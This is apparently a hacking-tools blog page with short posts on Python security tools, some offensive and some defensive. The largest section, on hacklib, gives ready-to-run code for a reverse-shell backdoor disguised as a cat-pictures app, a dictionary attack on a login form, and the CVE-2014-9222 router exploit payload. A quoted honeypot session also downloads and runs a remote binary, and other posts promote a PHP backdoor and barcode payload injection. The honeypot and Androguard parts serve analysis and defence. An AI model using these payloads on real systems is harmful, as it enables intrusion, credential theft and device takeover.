Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

Showing posts with label Python. Show all posts

Sunday, December 31, 2017

Python Telnet Honeypot For Catching Botnet Binaries - Telnet IoT Honeypot


This project implements a Python telnet server that acts as a honeypot for IoT malware, which spreads through horribly insecure default passwords on telnet servers on the internet.
Unlike https://github.com/stamparm/hontel or https://github.com/micheloosterhof/cowrie (examples), which provide full (via chroot) or simulated behaviour of a Linux system, this honeypot's goal is just to collect statistics on (IoT) botnets. This means the honeypot must work with every form of automated telnet session that may try to infect it with malware. Luckily, the infection process of this malware is quite simple: it just uses wget to download something and runs it.

Architecture
The application has a client/server architecture, with a client (the actual honeypot) accepting telnet connections and a server aggregating connection data and sample analysis.
However, for local deployments, the application can also be run in local mode to eliminate the need to run a client and server locally.

Running
The application has a config file named config.py. Samples are included for local and client/server deployments.

Client/Local Mode
python honey.py

Server
python backend.py

Opening the frontend
After the server is started, open html/index.html in your favorite browser. For this to work, the url in html/apiurl.js should point to your running backend, which it should do automatically for local deployments.

Sample Connection
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit 
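
The kind of statistics a collector can derive from the sample connection above, as an added example (not the project's own code): it pulls download URLs, busybox echo markers and executed files out of a recorded session. The function names and the DOWNLOADERS list are assumptions made for this sketch.

```python
import re
from urllib.parse import urlsplit

# Constructed input: the sample connection shown above, as a honeypot might log it.
SAMPLE_SESSION = """enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit
"""

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s;|&'\"()<>]+", re.I)
# Bots run "/bin/busybox <TOKEN>" and wait for the "applet not found" echo
# to confirm that the previous command finished.
MARKER_RE = re.compile(r"/bin/busybox\s+([A-Z0-9]{3,})\b")
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}  # assumed list, extend as needed

def split_commands(line):
    """Split a shell line on ; | & and parentheses into simple commands."""
    return [c.strip() for c in re.split(r"[;|&()]+", line) if c.strip()]

def summarize_session(text):
    """Return download URLs, busybox markers and executed paths from a session."""
    urls, markers, executed = [], set(), []
    for line in text.splitlines():
        markers.update(MARKER_RE.findall(line))
        for cmd in split_commands(line):
            argv = cmd.split()
            tool = argv[0].rsplit("/", 1)[-1]
            if tool == "busybox" and len(argv) > 1:
                tool, argv = argv[1], argv[1:]  # "busybox wget ..." applet form
            if tool in DOWNLOADERS:
                for url in URL_RE.findall(cmd):
                    parts = urlsplit(url)
                    urls.append({"url": url, "host": parts.hostname,
                                 "port": parts.port, "tool": tool})
            elif argv[0].startswith("./"):
                executed.append(argv[0])  # a dropped file being run
    return {"urls": urls, "markers": sorted(markers), "executed": executed}
```

The resulting host, port and marker values can be aggregated per source address to group sessions that belong to the same botnet campaign.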


Saturday, May 6, 2017

The Hacker's ToolBox - PloitKit



PloitKit is a Python-based GUI tool designed as a one-stop for all other software. I was facing these kinds of problems when I needed to switch to a different system, or I lost my pen drive. I had to go to Google, search for every tool, download every tool and so on. So I decided to create a tool in which I just click and click and the tool is there.
I have added more than 900+ tools to this tool, but only 400+ are available now, to test whether this tool will work; if it works, I'll make it available for everyone.

Features
  1. Auto-Update - No need to come over here and look for a new version every time.
  2. Better Error Handling - Some tools may cause errors, that's why I added this option.
  3. Graphical Interface - For just click & click.
  4. Malware Protection - All tools are downloaded from their original source, so no malware or viruses.
  5. Multi-Platform - Many tools are designed differently for Mac, Windows & Linux, so I added an option for that. Choose your platform and you're good to go.
  6. Better organised - Everything is better organised, nothing like searching for everything, and all that mess.
I believe that nothing can be perfect, so I added an option to report a tool, or send me suggestions about any new tool I should add.

Usage
git clone https://github.com/rajeshmajumdar/PloitKit.git

Windows
ploitkit.py

UNIX or Mac
python ploitkit.py




Sunday, October 16, 2016

Python Client with PHP Shell - tinyshell



A Python client with a PHP shell; it allows you to connect and send commands over the current protocol using POST and GET requests.

Features
  1. Connects with a direct session, with no need for a reverse connection.
  2. Supports password protection.
  3. Can be bound to any file with no damage.
  4. Uses GET/POST requests with error handling.

Usage
The project consists of two files:
  1. Remote shell Python file: the client used to connect to the target: python remote shell.py url password
  2. PHP shell file: the PHP backdoor. The password can be edited manually by modifying the code.

Credits
Lawrence Amer - Vulnerability Lab Researcher .


Sunday, October 9, 2016

Pentesting, Port Scanning, and Logging in anywhere with Python - hacklib



Toolkit for hacking enthusiasts using Python.
hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development.

Installation
To get hacklib, simply run in command line:
pip install hacklib
hacklib also has a user interface. To use it, you can do one of the following:
Download hacklib.py and run in console:
python hacklib.py
----------------------------------------------
Hey. What can I do you for?


Enter the number corresponding to your choice.

1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit
Or if you got it using pip:
import hacklib
hacklib.userInterface()

Dependencies
Not all classes have external dependencies, but just in case you can do the following:
hacklib.installDependencies()

Usage Examples
Reverse shell backdooring (Currently only for Macs):
import hacklib

bd = hacklib.Backdoor()
# Generates an app that, when ran, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app
Listen for connections with Server:
>>> import hacklib
>>> s = hacklib.Server(9090) # Bind server to port 9090
>>> s.listen()
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami # Type a command
leon
bash$ # Nice!


Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins:
import hacklib

ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')

# Check for a string in the resulting page
if 'Inbox' in htmldata: print 'Login Success.'
else: print 'Login Failed.'

# For logins using HTTP Basic Auth:
try:
    htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except: pass #login failed
Simple dictionary attack using AuthClient:
import hacklib

ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)

for p in passwords:
    htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
    if htmldata and 'welcome' in htmldata.lower():
        print 'Password is', p
        break


Port Scanning:
from hacklib import *

ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default

# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
    # Establish a TCP stream and send a message
    send(getIP('yourwebsite.com'), 80, message='GET HTTP/1.1 \r\n')
Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner:
>>> import hacklib

# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.

# Exploitation
>>> payload = '''GET /HTTP/1.1
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null byte.
# The router's admin page is now fully accessible from any web browser.


FTP authentication:
import hacklib
ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
    ftp.login('username', 'password')
except:
    print 'Login failed.'


Socks4/5 proxy scraping and tunneling:
>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules is routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read()
'41.203.214.58\n'
# Notes: Only network activity via Python is masked by the proxy.
# Network activity in other programs such as your web browser remains unmasked.
# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')


Word Mangling:
from hacklib import *

word = Mangle("Test", 0, 10, 1990, 2016)

word.Leet()
word.Numbers()
word.Years()
Output:
T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test


Pattern Create:
from hacklib import *

Pattern = PatternCreate(100)

Pattern.generate()
Output:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A


Pattern Offset:
from hacklib import *

Offset = PatternOffset("6Ab7")

Offset.find()
Output:
[+] Offset: 50




Sunday, July 24, 2016

Reverse engineering, Malware analysis of Android applications - Androguard



Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !)

Features
Androguard is a full python tool to play with Android files.
  • Map and manipulate DEX/ODEX/APK/AXML/ARSC formats into full Python objects,
  • Disassembly/Decompilation/Modification of DEX/ODEX/APK formats,
  • Decompilation with the first native (directly from Dalvik bytecode to Java source code) Dalvik decompiler (DAD),
  • Access to the static analysis of the code (basic blocks, instructions, permissions (with database from http://www.android-permissions.org/) ...) and create your own static analysis tool,
  • Analysis of a bunch of Android apps,
  • Analysis with ipython/Sublime Text Editor,
  • Diffing of Android applications,
  • Measure the efficiency of obfuscators (proguard, ...),
  • Determine if your application has been pirated (plagiarism/similarities/rip-off indicator),
  • Check if an Android application is present in a database (malware, goodware?),
  • Open source database of Android malware (this open-source database is done in my free time; of course my free time is limited, so if you want to help, you are welcome!),
  • Detection of ad/open source libraries (WIP),
  • Risk indicator of malicious applications,
  • Reverse engineering of applications (goodware, malware),
  • Transform Android's binary XML (like AndroidManifest.xml) into classic XML,
  • Visualize your application with gephi (gexf format), or with cytoscape (xgmml format), or PNG/DOT output,
  • Integration with external decompilers (JAD+dex2jar/DED/fernflower/jd-gui...)


Monday, July 4, 2016

Tool for Injecting Malicious Payloads Into Barcodes - Scansploit



Tool for Injecting Malicious Payloads Into Barcodes 

  • Barcodes (code128)
  • QRCodes
  • DataMatrix
  • EAN13


Requirements

  • Python3
  • PyStrich
      pip3 install pystrich
      In case of jpeg error: sudo apt-get install libtiff5-dev zlib1g-dev libfreetype6-dev liblcms2-dev libwebp-dev tcl8.6-dev tk8.6-dev python-tk
  • Pillow
      pip3 install pillow



Sunday, July 3, 2016

Python Network Pentesting Tool - Pythem




PytheM is a Python network/pentesting tool. It has been developed in the hope that it will be useful, and I don't take responsibility for any misapplication of it. Only for GNU/Linux OS.


Installation
$ sudo git clone https://github.com/m4n3dw0lf/PytheM/
$ cd PytheM
$ sudo pip install -r requirements.txt
$ sudo ./pythem

Features
  • [Brute-Force]
  • [Man-In-The-Middle]
  • [Remote]
  • [Sniffing]
  • [Scanning]
  • [Web]
  • [Wireless]

